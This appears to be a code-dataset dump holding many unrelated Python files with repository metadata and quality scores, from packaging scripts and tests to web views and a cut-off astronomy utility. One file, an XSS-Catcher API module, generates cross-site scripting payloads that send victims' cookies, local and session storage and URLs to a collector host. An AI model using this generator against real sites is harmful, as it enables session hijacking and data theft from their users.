max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
tests/setup.py | rdmolony/berpublicsearch | 0 | 12794251 | import os
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(
name="geopandas",
version=versioneer.get_version(),
description="Geographic pandas extensions",
license="BSD",
author="GeoPandas contributors",
author_email="<EMAIL>",
url="http://geopandas.org",
long_description=LONG_DESCRIPTION,
packages=[
"geopandas",
"geopandas.io",
"geopandas.tools",
"geopandas.datasets",
"geopandas.tests",
"geopandas.tools.tests",
],
package_data={"geopandas": data_files},
python_requires=">=3.6",
install_requires=INSTALL_REQUIRES,
cmdclass=versioneer.get_cmdclass(),
) | 1.398438 | 1 |
Misc/Join Function.py | Jigyanshu17/Python-Ka-Saara-Gyaan | 0 | 12794252 | <filename>Misc/Join Function.py
# list = ["John","Cena","Randy","Orton","Sheamus","Khali","<NAME>"]
# # for item in list:
# # print(item,"and",end=" ")
#
#
# a = " , ".join(list)
# print(a , " other are wwe superstars")
a = 123
def fun():
a = []
print(type(a)) | 3.53125 | 4 |
linuxmachinebeta/view/api/serializers.py | linux-machine/linuxmachinebeta | 0 | 12794253 | <filename>linuxmachinebeta/view/api/serializers.py
from django.utils.translation import gettext_lazy as _
from rest_framework import serializers
from linuxmachinebeta.view.models import ServiceView
from linuxmachinebeta.services.models import Service
class ServiceViewSerializer(serializers.ModelSerializer):
service = serializers.PrimaryKeyRelatedField(queryset=Service.objects.all())
class Meta:
model = ServiceView
fields = ['service']
def validate(self, attrs):
try:
ServiceView.objects.get(service=attrs['service'], user_ip=self.context['user_ip'])
except ServiceView.DoesNotExist:
return attrs
else:
raise serializers.ValidationError(_('You have already viewed this service.'))
| 2.328125 | 2 |
server/app/api/xss.py | vncloudsco/XSS-Catcher | 1 | 12794254 | <gh_stars>1-10
from flask import jsonify, request
from app import db
from app.models import Client, XSS
from app.api import bp
from flask_login import login_required, current_user
from app.decorators import permissions
import json
@bp.route('/xss/generate/<id>', methods=['GET'])
@login_required
def xss_generate(id):
"""Generates an XSS payload"""
client = Client.query.filter_by(id=id).first_or_404()
uid = client.uid
parameters = request.args.to_dict()
other_data = ''
xss_type = 'r'
require_js = False
require_params = False
cookies = False
local_storage = False
session_storage = False
get_url = False
i_want_it_all = False
code_type = 'html'
if 'url' not in parameters.keys():
return jsonify({'status': 'error', 'detail': 'Missing url parameter'}), 400
for param, value in parameters.items():
if param == 'url':
url = value
elif param == 'i_want_it_all':
i_want_it_all = True
elif param == 'stored':
xss_type = 's'
elif param == 'cookies':
cookies = True
require_js = True
require_params = True
elif param == 'local_storage':
local_storage = True
require_js = True
require_params = True
elif param == 'session_storage':
session_storage = True
require_js = True
require_params = True
elif param == 'code':
if value == 'html':
code_type = 'html'
elif value == 'js':
code_type = 'js'
require_js = True
else:
return jsonify({'status': 'error', 'detail': 'Unknown code type'}), 400
elif param == 'geturl':
get_url = True
require_js = True
require_params = True
else:
if other_data != '':
other_data += '&'
other_data += '{}={}'.format(param, value)
require_params = True
if i_want_it_all:
if code_type == 'js':
payload = ';}};var js=document.createElement("script");js.src="{}/static/collector.min.js";js.onload=function(){{sendData("{}/api/x/{}/{}","{}")}};document.body.appendChild(js);'.format(
url, url, xss_type, uid, other_data)
return (payload), 200
else:
payload = """'>"><script src={}/static/collector.min.js></script><script>sendData("{}/api/x/{}/{}", "{}")</script>""".format(
url, url, xss_type, uid, other_data)
return (payload), 200
if code_type == 'js':
payload = ';};new Image().src="'
else:
payload = """'>">"""
if require_js:
payload += '<script>new Image().src="'
else:
payload += '<img src="'
payload += '{}/api/x/{}/{}'.format(url, xss_type, uid)
if require_params:
payload += '?'
if cookies:
payload += 'cookies="+encodeURIComponent(document.cookie)'
if local_storage:
if cookies:
payload += '+"&'
payload += 'local_storage="+encodeURIComponent(JSON.stringify(localStorage))'
if session_storage:
if cookies or local_storage:
payload += '+"&'
payload += 'session_storage="+encodeURIComponent(JSON.stringify(sessionStorage))'
if get_url:
if cookies or local_storage or session_storage:
payload += '+"&'
payload += 'origin_url="+encodeURIComponent(location.href)'
if other_data != '':
if cookies or local_storage or session_storage or get_url:
payload += '+"&'
payload += other_data
payload += '"'
if not require_params:
payload += '"'
if code_type == 'js':
payload += ';'
else:
if require_js:
payload += '</script>'
else:
payload += ' />'
return (payload), 200
@bp.route('/xss/<xss_id>', methods=['DELETE'])
@login_required
@permissions(one_of=['admin', 'owner'])
def xss_delete(xss_id):
"""Deletes an XSS"""
xss = XSS.query.filter_by(id=xss_id).first_or_404()
db.session.delete(xss)
db.session.commit()
return jsonify({'status': 'OK', 'detail': 'XSS deleted successfuly'}), 200
@bp.route('/xss/<xss_id>/<loot_type>', methods=['GET'])
@login_required
def xss_loot_get(xss_id, loot_type):
"""Gets a specific type of data for an XSS"""
xss = XSS.query.filter_by(id=xss_id).first_or_404()
data = json.loads(xss.data)
return jsonify({'data': data[loot_type]}), 200
@bp.route('/xss/<xss_id>/<loot_type>', methods=['DELETE'])
@login_required
@permissions(one_of=['admin', 'owner'])
def xss_loot_delete(xss_id, loot_type):
"""Deletes a specific type of data for an XSS"""
xss = XSS.query.filter_by(id=xss_id).first_or_404()
data = json.loads(xss.data)
data.pop(loot_type, None)
xss.data = json.dumps(data)
db.session.commit()
return jsonify({'status': 'OK', 'detail': 'Data deleted successfuly'}), 200
| 2.78125 | 3 |
tests/test_ccppasswordrestsecure.py | dvdangelo33/pyaim | 0 | 12794255 | #!/usr/bin/env python3
from pyaim import CCPPasswordRESTSecure
aimccp = CCPPasswordRESTSecure('https://cyberark.dvdangelo33.dev/', "clientcert.pem", verify=True)
r = aimccp.GetPassword(appid='pyAIM',safe='D-AWS-AccessKeys',username='AnsibleAWSUser')
print(r)
| 1.765625 | 2 |
clonigram/posts/apps.py | EdinsonRequena/platzi-django-course | 1 | 12794256 | '''
Post application module.
'''
from django.apps import AppConfig
class PostsConfig(AppConfig):
'''
:type name: str
:type verbose_name: str
'''
name = 'posts'
verbose_name = 'Posts'
| 1.710938 | 2 |
tests/opening_test.py | karlch/vimiv | 268 | 12794257 | <reponame>karlch/vimiv
# vim: ft=python fileencoding=utf-8 sw=4 et sts=4
"""Test the opening of different file-types with vimiv."""
import os
from unittest import main
from vimiv_testcase import VimivTestCase
class OpeningTest(VimivTestCase):
"""Open with different file-types Test."""
@classmethod
def setUpClass(cls):
cls.init_test(cls)
def test_opening_with_directory(self):
"""Opening with a directory."""
expected_dir = os.path.abspath("vimiv/testimages")
self.init_test(["vimiv/testimages"])
self.assertEqual(expected_dir, os.getcwd())
expected_files = ["animation", "arch-logo.png", "arch_001.jpg",
"directory", "symlink_to_image", "vimiv.bmp",
"vimiv.svg", "vimiv.tiff"]
self.assertEqual(self.vimiv["library"].files, expected_files)
self.assertTrue(self.vimiv["library"].is_focus())
self.assertTrue(self.vimiv["library"].grid.is_visible())
def test_opening_with_image(self):
"""Open with an image."""
expected_dir = os.path.abspath("vimiv/testimages")
self.init_test(["vimiv/testimages/arch_001.jpg"])
# Check moving and image population
self.assertEqual(expected_dir, os.getcwd())
expected_images = ["arch_001.jpg", "symlink_to_image", "vimiv.bmp",
"vimiv.svg", "vimiv.tiff", "arch-logo.png"]
for image in [os.path.abspath(im) for im in expected_images]:
self.assertIn(image, self.vimiv.get_paths())
def test_opening_with_symlink(self):
"""Open with a symlink to an image."""
expected_dir = os.path.abspath("vimiv/testimages")
self.init_test(["vimiv/testimages/symlink_to_image"])
# Check moving and image population
self.assertEqual(expected_dir, os.getcwd())
expected_images = ["symlink_to_image", "vimiv.bmp", "vimiv.svg",
"vimiv.tiff", "arch-logo.png", "arch_001.jpg"]
expected_images = [os.path.abspath(image) for image in expected_images]
for image in [os.path.abspath(im) for im in expected_images]:
self.assertIn(image, self.vimiv.get_paths())
def test_opening_with_whitespace(self):
"""Open an image with whitespace and symlink in directory."""
expected_dir = os.path.abspath("vimiv/testimages/directory/")
self.init_test(["vimiv/testimages/directory/symlink with spaces .jpg"])
# Check moving and image population
self.assertEqual(expected_dir, os.getcwd())
expected_images = ["symlink with spaces .jpg"]
expected_images = [os.path.abspath(image) for image in expected_images]
self.assertEqual(expected_images, self.vimiv.get_paths())
def test_opening_recursively(self):
"""Open all images recursively."""
# Need to backup because we init in the wrong directory here
working_dir = self.working_directory
os.chdir("vimiv/testimages")
self.init_test(["."], to_set=["recursive"], values=["true"])
self.assertEqual(8, len(self.vimiv.get_paths()))
self.settings.reset()
self.working_directory = working_dir
def tearDown(self):
self.vimiv.quit()
os.chdir(self.working_directory)
if __name__ == "__main__":
main()
| 2.546875 | 3 |
flexget/plugins/operate/disable_builtins.py | Crupuk/Flexget | 0 | 12794258 | from __future__ import unicode_literals, division, absolute_import
import logging
from flexget import plugin
from flexget.plugin import priority, register_plugin, plugins
log = logging.getLogger('builtins')
def all_builtins():
"""Helper function to return an iterator over all builtin plugins."""
return (plugin for plugin in plugins.itervalues() if plugin.builtin)
class PluginDisableBuiltins(object):
"""Disables all (or specific) builtin plugins from a task."""
def __init__(self):
# cannot trust that on_task_start would have been executed
self.disabled = []
# TODO: schemas are registered to a uri at plugin load, the list of builtins will not be complete at that time
schema = {
'oneOf': [
{'type': 'boolean'},
{'type': 'array', 'items': {'type': 'string', 'enum': [p.name for p in all_builtins()]}}
]
}
def debug(self):
log.debug('Builtin plugins: %s' % ', '.join(plugin.name for plugin in all_builtins()))
@priority(255)
def on_task_start(self, task, config):
self.disabled = []
if not config:
return
for plugin in all_builtins():
if config is True or plugin.name in config:
plugin.builtin = False
self.disabled.append(plugin.name)
log.debug('Disabled builtin plugin(s): %s' % ', '.join(self.disabled))
@priority(-255)
def on_task_exit(self, task, config):
if not self.disabled:
return
for name in self.disabled:
plugin.plugins[name].builtin = True
log.debug('Enabled builtin plugin(s): %s' % ', '.join(self.disabled))
self.disabled = []
on_task_abort = on_task_exit
register_plugin(PluginDisableBuiltins, 'disable_builtins', api_ver=2)
| 2.15625 | 2 |
warehouse/legacy/pypi.py | hickford/warehouse | 1 | 12794259 | <filename>warehouse/legacy/pypi.py
# Copyright 2013 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import time
from werkzeug.utils import redirect
from werkzeug.exceptions import NotFound, BadRequest
from warehouse import fastly
from warehouse.helpers import url_for
from warehouse.http import Response
from warehouse.legacy import xmlrpc
from warehouse.templates import render_response
from warehouse.utils import cache, cors, is_valid_json_callback_name
_action_methods = {}
def register(name):
"""Register a handler for a legacy :action style dispatch.
Most of the dispatch in legacy PyPI was implemented using a :action
parameter in the GET or POST arguments.
This doesn't actually decorate the function or alter it in any way, it
simply registers it with the legacy routing mapping.
"""
if name in _action_methods:
raise KeyError('Attempt to re-register name %r' % (name, ))
def deco(fn):
_action_methods[name] = fn
return fn
return deco
def pypi(app, request):
# check for the legacy :action-style dispatch
action = request.args.get(':action')
if action in _action_methods:
return _action_methods[action](app, request)
# No :action means we render the index, or at least we redirect to where it
# moved to
return redirect(
url_for(
request,
"warehouse.views.index",
),
code=301,
)
def daytime(app, request):
response = time.strftime("%Y%m%dT%H:%M:%S\n", time.gmtime(time.time()))
return Response(response, mimetype="text/plain")
@cors
@cache(browser=1, varnish=120)
@fastly.projects(project_name="project")
def project_json(app, request, project_name, version=None):
# fail early if callback is invalid
callback = request.args.get('callback')
if callback:
if not is_valid_json_callback_name(callback):
raise BadRequest('invalid JSONP callback name')
# Get the real project name for this project
project = app.db.packaging.get_project(project_name)
if project is None:
raise NotFound("{} does not exist".format(project_name))
# we're looking for the latest version
versions = app.db.packaging.get_project_versions(project['name'])
if version is None:
if not versions:
raise NotFound("{} has no releases".format(project_name))
version = versions[0]
elif version not in versions:
raise NotFound("{} has no release {}".format(project_name, version))
rpc = xmlrpc.Interface(app, request)
d = dict(
info=rpc.release_data(project['name'], version),
urls=rpc.release_urls(project['name'], version),
releases=rpc.all_release_urls(project['name']),
)
time_format = '%Y-%m-%dT%H:%M:%S'
for url in d['urls']:
url['upload_time'] = url['upload_time'].strftime(time_format)
for release, urls in d['releases'].items():
for url in urls:
url['upload_time'] = url['upload_time'].strftime(time_format)
data = json.dumps(d, sort_keys=True)
# write the JSONP extra crap if necessary
if callback:
data = '/**/ %s(%s);' % (callback, data)
serial = app.db.packaging.get_last_serial()
response = Response(data, mimetype="application/json")
response.headers['Content-Disposition'] = 'inline'
response.headers.add("X-PyPI-Last-Serial", serial)
return response
@register('rss')
@cache(browser=1, varnish=120)
@fastly.rss
def rss(app, request):
"""Dump the last N days' updates as an RSS feed.
"""
releases = app.db.packaging.get_recently_updated(num=40)
for release in releases:
# TODO update _force_external to _external when Flask-ification is done
url = url_for(request, 'warehouse.packaging.views.project_detail',
project_name=release['name'], version=release['version'],
_force_external=True)
release.update(dict(url=url))
response = render_response(
app, request, "legacy/rss.xml",
description='package updates',
releases=releases,
site=app.config.site,
)
response.mimetype = 'text/xml; charset=utf-8'
# TODO: throw in a last-modified header too?
return response
@register('packages_rss')
@cache(browser=1, varnish=120)
@fastly.rss
def packages_rss(app, request):
"""Dump the last N days' new projects as an RSS feed.
"""
releases = app.db.packaging.get_recent_projects(num=40)
for release in releases:
# TODO update _force_external to _external when Flask-ification is done
url = url_for(request, 'warehouse.packaging.views.project_detail',
project_name=release['name'], _force_external=True)
release.update(dict(url=url))
response = render_response(
app, request, "legacy/rss.xml",
description='new projects',
releases=releases,
site=app.config.site,
)
response.mimetype = 'text/xml; charset=utf-8'
# TODO: throw in a last-modified header too?
return response
| 2.21875 | 2 |
CCF/CSP/2013/13123.py | cnsteven/online-judge | 1 | 12794260 | <reponame>cnsteven/online-judge
n = int(input())
h = list(map(int, input().split()))
ans = 0
for i in range(n):
min_height = h[i]
for j in range(i, n):
min_height = min(min_height, h[j])
ans = max(ans, (j - i + 1) * min_height)
print(ans)
| 3.015625 | 3 |
2018/07/debug_me/1_2.py | lfrommelt/monty | 0 | 12794261 | # drink price list
prices = {coke: 2, beer: 2.5, water: 0, juice: 2}
print(price('beer'))
| 2.828125 | 3 |
tests/test_helpers.py | nvn-nil/bigo_test | 0 | 12794262 | <reponame>nvn-nil/bigo_test
# -*- coding: utf-8 -*-
import unittest
from time import sleep
import numpy as np
from bigo_test.assertions.helpers import execution_timer
def test_func_factory(n):
def func(a):
# pylint: disable=unused-argument
sleep(n)
return func
class TestHelpers(unittest.TestCase):
def test_execution_timer(self):
func = test_func_factory(1)
numbers, times = execution_timer(func, lambda x: x, options={"minimum_n": 1, "maximum_n": 1, "n_count": 2})
np.testing.assert_array_equal(numbers, np.array([1, 1]))
np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1)
def test_execution_timer_defaults(self):
func = test_func_factory(1)
numbers, times = execution_timer(func)
np.testing.assert_array_equal(numbers, np.array([1, 1]))
np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1)
def test_execution_timer_maximum_n_lesser_than_minimum_n(self):
func = test_func_factory(1)
numbers, times = execution_timer(func, options={"minimum_n": 2, "maximum_n": 1})
np.testing.assert_array_equal(numbers, np.array([2, 2]))
np.testing.assert_almost_equal(times, np.array([1, 1]), decimal=1)
if __name__ == "__main__":
unittest.main()
| 2.40625 | 2 |
colorcode/convert.py | nonylene/lostfound | 0 | 12794263 | <gh_stars>0
from config import COLORS
def to_color(code, color):
r,g,b = (int(code[i*2+1:i*2+3],16) for i in range(3))
return (color, {'r': r, 'g': g, 'b': b})
d = dict(to_color(code,color) for code, color in COLORS)
import json
print(json.dumps(d,ensure_ascii=False))
| 3.203125 | 3 |
spotify_wordcloud/config.py | HelloRusk/spotify-wordcloud | 9 | 12794264 | from dotenv import load_dotenv
from os import environ, path
from pathlib import Path
load_dotenv(verbose=True)
parent_path = Path(__file__).parent
dotenv_path = path.join(parent_path, ".env")
load_dotenv(dotenv_path)
CSRF_COOKIE_SECURE = True
CSRF_COOKIE_HTTPONLY = True
SECRET_KEY = environ.get("SECRET_KEY")
SPOTIFY_OAUTH_CLIENT_ID = environ.get("SPOTIFY_OAUTH_CLIENT_ID")
SPOTIFY_OAUTH_CLIENT_SECRET = environ.get("SPOTIFY_OAUTH_CLIENT_SECRET")
CLOUD_STORAGE_BUCKET = environ.get("CLOUD_STORAGE_BUCKET")
FLASK_DEBUG = environ.get("FLASK_DEBUG")
TESTING = environ.get("TESTING")
if FLASK_DEBUG or TESTING:
CALLBACK_URL = environ.get("CALLBACK_URL_DEV")
SQLALCHEMY_DATABASE_URI = environ.get("DATABASE_URL_DEV")
else:
CALLBACK_URL = environ.get("CALLBACK_URL")
SQLALCHEMY_DATABASE_URI = environ.get("DATABASE_URL")
SQLALCHEMY_TRACK_MODIFICATIONS = True
| 2.046875 | 2 |
config.py | Anonymous78/Registration-System | 0 | 12794265 | <reponame>Anonymous78/Registration-System<filename>config.py
# config.py
"""
Module containing the configurations for different environments
"""
class Config(object):
"""Common configurations"""
# Put any configurations common across all environments
SESSION_COOKIE_NAME = "session"
TESTING = False
class DevelopmentConfig(Config):
"""Development configurations"""
DEBUG = True # activates debug mode on app
SQLALCHEMY_ECHO = True # allows SQLAlchemy to log errors
SQLALCHEMY_TRACK_MODIFICATIONS = True # allows SQLAlchemy to track changes while running
class ProductionConfig(Config):
"""Production configurations"""
DEBUG = False
SQLALCHEMY_TRACK_MODIFICATIONS = False
app_config = {
'development': 'DevelopmentConfig',
'production': 'ProductionConfig'
}
| 2.5 | 2 |
stations/tests/test_validation.py | sharksmhi/stations | 0 | 12794266 | <gh_stars>0
# Copyright (c) 2020 SMHI, Swedish Meteorological and Hydrological Institute
# License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit).
"""
Created on 2020-10-01 16:37
@author: a002028
"""
from stations.main import App
if __name__ == '__main__':
app = App()
app.read_list(
'C:/Arbetsmapp/config/station.txt',
reader='shark_master',
list_name='master'
)
# fid = 'C:\\station_exports\\validerade\\Stationsregistret_validering_gävle_validerad.xlsx'
# fid = 'C:\\station_exports\\nkp\\Stationsregistret_validering.xlsx'
fid = 'C:\\station_exports\\natvat\\StnReg03_Inmatningsmall.xlsx'
app.read_list(
fid,
reader='stnreg',
list_name='stnreg_import'
)
app.validate_list('stnreg_import') #, 'master')
# from stations.validators.validator import ValidatorLog
# app.write_list(
# writer='validation_log',
# data=ValidatorLog.log
# )
#
# app.write_list(
# writer='shark_master',
# list_names=['master', 'stnreg_import'],
# )
app.write_list(
writer='stnreg',
list_names='stnreg_import',
)
# file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp'
# validator = PositionValidator(file_path=file_path)
# print('shapes read')
#
# report = validator.validate(app.lists['master'])
| 1.882813 | 2 |
SIS/forms.py | toHarsh/Management-System | 2 | 12794267 | from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, PasswordField
from wtforms.validators import Email,DataRequired,Length, ValidationError
from SIS.models import Info
import email_validator
class sisForm(FlaskForm):
rollNo = StringField('Roll No',
validators=[DataRequired()])
prn = StringField('Roll No',
validators=[DataRequired(),Length(min=9,max=10)])
name = StringField('Name',
validators=[DataRequired(),Length(min=2,max=40)])
mobNo = StringField('Mobile No',
validators=[DataRequired(),Length(min=9,max=10)])
email = StringField('Email',
validators=[DataRequired(), Email()])
city = StringField('Name',
validators=[DataRequired(),Length(min=2,max=40)])
state = StringField('Name',
validators=[DataRequired(),Length(min=2,max=40)])
submit = SubmitField('Submit')
def validate_rollNo(self,rollNo):
info = Info.query.filter_by(rollNo=rollNo.data).first()
if info:
raise ValidationError('This Roll No is already there in the database.')
def validate_prn(self,prn):
info = Info.query.filter_by(prn=prn.data).first()
if info:
raise ValidationError('This PRN is already there in the database.')
def validate_mobNo(self,mobNo):
info = Info.query.filter_by(mobNo=mobNo.data).first()
if info:
raise ValidationError('This Mobile Number is already there in the database.')
def validate_email(self,email):
info = Info.query.filter_by(email=email.data).first()
if info:
raise ValidationError('This Email is already there in the database.')
class adminForm(FlaskForm):
email = StringField('Email',
validators=[DataRequired(), Email()])
password = PasswordField('Password',
validators=[DataRequired(),Length(min=2,max=10)])
submit = SubmitField('Submit') | 2.78125 | 3 |
SVM/Cancer_prediction.py | AlexKH22/Machine_Learning | 0 | 12794268 | <filename>SVM/Cancer_prediction.py
import numpy as np
from sklearn import cross_validation, svm
import pandas as pd
df = pd.read_csv('breast-cancer-wisconsin.data.txt')
df.replace('?',-99999, inplace=True)
df.drop(['id'], 1, inplace=True)
X = np.array(df.drop(['class'], 1))
y = np.array(df['class'])
X_train, X_test, y_train, y_test = cross_validation.train_test_split(X, y, test_size=0.2)
clf = svm.SVC()
clf.fit(X_train, y_train)
confidence = clf.score(X_test, y_test)
print(confidence)
example_measures = np.array([[4, 2, 1, 1, 1, 2, 3, 2, 1]])
example_measures = example_measures.reshape(len(example_measures), -1)
prediction = clf.predict(example_measures)
print(prediction)
| 3.078125 | 3 |
tests/viewmixins/forms.py | samuelmaudo/yepes | 0 | 12794269 | # -*- coding:utf-8 -*-
from __future__ import unicode_literals
from django import forms
class JsonMixinForm(forms.Form):
boolean = forms.BooleanField()
char = forms.CharField(
min_length=3,
max_length=6)
integer = forms.IntegerField(
min_value=3,
max_value=6)
| 2.109375 | 2 |
contrail_api_cli/commands/rm.py | mrasskazov/contrail-api-cli | 0 | 12794270 | <reponame>mrasskazov/contrail-api-cli<gh_stars>0
# -*- coding: utf-8 -*-
import itertools
from ..command import Command, Arg, Option, experimental, expand_paths
from ..resource import Resource
from ..utils import continue_prompt
@experimental
class Rm(Command):
"""Delete a resource from the API.
.. warning::
`-r` option can be used to delete recursively back_refs of
the resource.
"""
description = "Delete a resource"
paths = Arg(nargs="*", help="Resource path(s)",
metavar='path', complete="resources::path")
recursive = Option("-r", action="store_true",
default=False,
help="Recursive delete of back_refs and children resources")
force = Option("-f", action="store_true",
default=False,
help="Don't ask for confirmation")
def _get_back_refs(self, resources, back_refs):
for resource in resources:
resource.fetch()
if resource in back_refs:
back_refs.remove(resource)
back_refs.append(resource)
for back_ref in itertools.chain(resource.back_refs, resource.children):
back_refs = self._get_back_refs([back_ref], back_refs)
return back_refs
def __call__(self, paths=None, recursive=False, force=False):
resources = expand_paths(paths,
predicate=lambda r: isinstance(r, Resource))
if recursive:
resources = self._get_back_refs(resources, [])
if resources:
message = """About to delete:
- %s""" % "\n - ".join([self.current_path(r) for r in resources])
if force or continue_prompt(message=message):
for r in reversed(resources):
print(("Deleting %s" % self.current_path(r)))
r.delete()
| 2.390625 | 2 |
r_pass/urls.py | abztrakt/r-pass | 0 | 12794271 | from django.conf.urls import patterns, include, url
urlpatterns = patterns('',
# Examples:
url(r'^service/.*/(?P<service_id>[0-9]+)/edit/?$', 'r_pass.views.edit'),
url(r'^service/.*/(?P<service_id>[0-9]+)/?$', 'r_pass.views.service'),
url(r'^create/?$', 'r_pass.views.create'),
url(r'', 'r_pass.views.home'),
)
| 1.898438 | 2 |
stack-trace-solver-be/src/exception_extractor.py | TeamInterject/stack-trace-solver | 0 | 12794272 | from regex_matchers import retrieve_exceptions
from utils import chunks
import threading
import glob
from pathlib import Path
import os
def extract_exceptions(files):
for path in files:
fileName = Path(path).stem
outputFile = f"ignored_data/exceptions/{fileName}.txt"
if os.path.isfile(outputFile):
continue
with open(path, "r+", encoding="utf-8", errors='ignore') as file:
lines = "\n".join(file.readlines())
excs = retrieve_exceptions(lines)
if len(excs) == 0:
continue
print(path)
with open(f"ignored_data/exceptions/{fileName}.txt", "a", encoding="utf-8", errors="ignore") as output:
for exception in excs:
output.write(exception.__str__() + "\n")
def orchestrate_extraction(threads=8):
files = glob.glob("ignored_data/downloads/*.xml")
files.sort()
chunked_files = chunks(files, threads)
threads = []
for chunk in chunked_files:
t = threading.Thread(target=extract_exceptions, args=(chunk,))
threads.append(t)
t.start()
for t in threads:
t.join()
files = glob.glob("ignored_data/exceptions/*.txt")
for path in files:
with open(f"ignored_data/exceptions.txt", "a", encoding="utf-8", errors="ignore") as output:
with open(path, "r+", encoding="utf-8", errors='ignore') as file:
lines = "\n".join(file.readlines())
output.write(lines)
def load_exceptions(filename):
with open(f"ignored_data/{filename}", "r+", encoding="utf-8", errors='ignore') as file:
lines = "\n".join(file.readlines())
return retrieve_exceptions(lines)
def retrieve_exception_dictionary(filename):
exceptions = load_exceptions(filename)
ex_dict = {}
for exception in exceptions:
if exception.exception not in ex_dict:
ex_dict[exception.exception] = []
ex_dict[exception.exception].append(exception)
return ex_dict
def debug_print(filename):
ex_dict = retrieve_exception_dictionary(filename)
ex_dict_keys = list(ex_dict.keys())
ex_dict_keys.sort()
for key in ex_dict_keys:
values = ex_dict[key]
if len(values) < 2:
continue
print(key)
for value in values:
print(f"\t{value}")
# debug_print("exceptions_minimized.txt") | 2.796875 | 3 |
PreFRBLE/PreFRBLE/convenience.py | FRBs/PreFRBLE | 5 | 12794273 | from __future__ import print_function
import sys, h5py as h5, numpy as np, yt, csv
from time import time, sleep
from PreFRBLE.file_system import *
from PreFRBLE.parameter import *
from time import time
def TimeElapsed( func, *args, **kwargs ):
""" measure time taken to compute function """
def MeasureTime():
t0 = time()
res = func( *args, **kwargs)
print( "{} took {} s".format( func.__name__, time()-t0 ) )
return res
return MeasureTime()
from time import sleep
## wrapper to write hdf5 files consistently
def Write2h5( filename='', datas=[], keys=[] ):
""" conveniently write datas to keys in filename. overwrite existing entries """
if type(keys) is str:
sys.exit( 'Write2h5 needs list of datas and keys' )
### small workaround to allow for parallel computation. Use with caution, might corrupt nodes in your h5 file. in that case, visit:
### https://stackoverflow.com/questions/47979751/recover-data-from-corrupted-file/61147632?noredirect=1#comment108190378_61147632
tries = 0
while tries < 30:
#try:
with h5.File( filename, 'a' ) as f:
for data, key in zip( datas, keys ):
try:
f[key][()]
f.__delitem__( key )
except:
pass
f.create_dataset( key, data=data )
break
#except:
sleep(3e-2)
tries += 1
pass
else:
print( "couldn't write ", keys )
sys.exit(1)
## Read FRBcat
#FRB_dtype = [('ID','S'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','S'), ('tele','S')]
#FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','U10'),('tau','U10'),('host_redshift','U4'), ('tele','U10')]
FRB_dtype = [('ID','U9'),('DM','f'),('DM_gal','f'), ('RM','f'),('tau','f'),('host_redshift','f'), ('tele','U10')]
def GetFRBcat( telescopes=None, RM=None, tau=None, print_number=False ):
"""
read all FRBs in FRBcat, downloaded to frbcat_file
Parameters
----------
telescopes : list
list of considered telescopes, FRBs of other telescopes are ignored
RM : boolean
if True, only return FRBs observed with RM
tau : boolean
if True, only return FRBs observed with temproal broadening
print_number : boolean
if True, print number of extractet FRBs
Returns
-------
FRBs : array
structured numpy.array containing values listed in FRBcat
"""
### read all FRBs from FRBcat
### optional: read only those FRBs observed by telescope with RM and tau
### print_number:True print number of extracted FRBs
FRBs = []
with open( frbcat_file, 'r') as f:
reader = csv.reader( f )
header = np.array(next(reader))
# header = np.array(reader.next())
i_ID = 0
i_DM = np.where( header == 'rmp_dm' )[0][0]
i_DM_gal = np.where( header == 'rop_mw_dm_limit' )[0][0]
i_RM = np.where( header == 'rmp_rm' )[0][0]
i_tau = np.where( header == 'rmp_scattering' )[0][0]
i_zs = np.where( header == 'rmp_redshift_host' )[0][0]
i_tele = np.where( header == 'telescope' )[0][0]
i_s = [i_ID, i_DM, i_DM_gal, i_RM, i_tau, i_zs, i_tele] ## order must fit order of FRB_dtype
for row in reader:
if telescopes and ( row[i_tele] not in [telescopes_FRBcat[tele] for tele in telescopes] ) :
continue
if tau and ( row[i_tau] == 'null' ) :
continue
if RM and ( row[i_RM] == 'null' ) :
continue
FRBs.append( tuple( [ decode(row[i].split('&')[0], dtype) for i, dtype in zip( i_s, np.array(FRB_dtype)[:,1] ) ] ) )
return np.array( FRBs, dtype=FRB_dtype )
def decode( string, dtype='U' ):
""" short wrapper to decode byte-strings read from FRBcat """
if 'f' in dtype:
if 'null' in string:
return float('NaN')
return float(string)
return string
def GetFRBsMeasures( measure='DM', FRBs=None ):
""" returns measures of FRBs in FRBcat read with GetFRBcat() """
if measure == 'DM':
return FRBs['DM']-FRBs['DM_gal']
elif measure == 'RM':
return FRBs['RM']
## flocker to keep parallel processes from writing to same file simultaneously
## provided by derpston, https://github.com/derpston/python-simpleflock/blob/master/src/simpleflock.py#L14
import os, fcntl, errno
class SimpleFlock:
"""Provides the simplest possible interface to flock-based file locking. Intended for use with the `with` syntax. It will create/truncate/delete the lock file as necessary."""
def __init__(self, path, timeout = None):
self._path = path
self._timeout = timeout
self._fd = None
def __enter__(self):
self._fd = os.open(self._path, os.O_CREAT)
start_lock_search = time()
while True:
try:
fcntl.flock(self._fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
# Lock acquired!
return
except (OSError, IOError) as ex:
if ex.errno != errno.EAGAIN: # Resource temporarily unavailable
raise
elif self._timeout is not None and time() > (start_lock_search + self._timeout):
# Exceeded the user-specified timeout.
print( "timeout exceeded" )
raise
# TODO It would be nice to avoid an arbitrary sleep here, but spinning
# without a delay is also undesirable.
sleep(0.1)
def __exit__(self, *args):
fcntl.flock(self._fd, fcntl.LOCK_UN)
os.close(self._fd)
self._fd = None
# Try to remove the lock file, but don't try too hard because it is
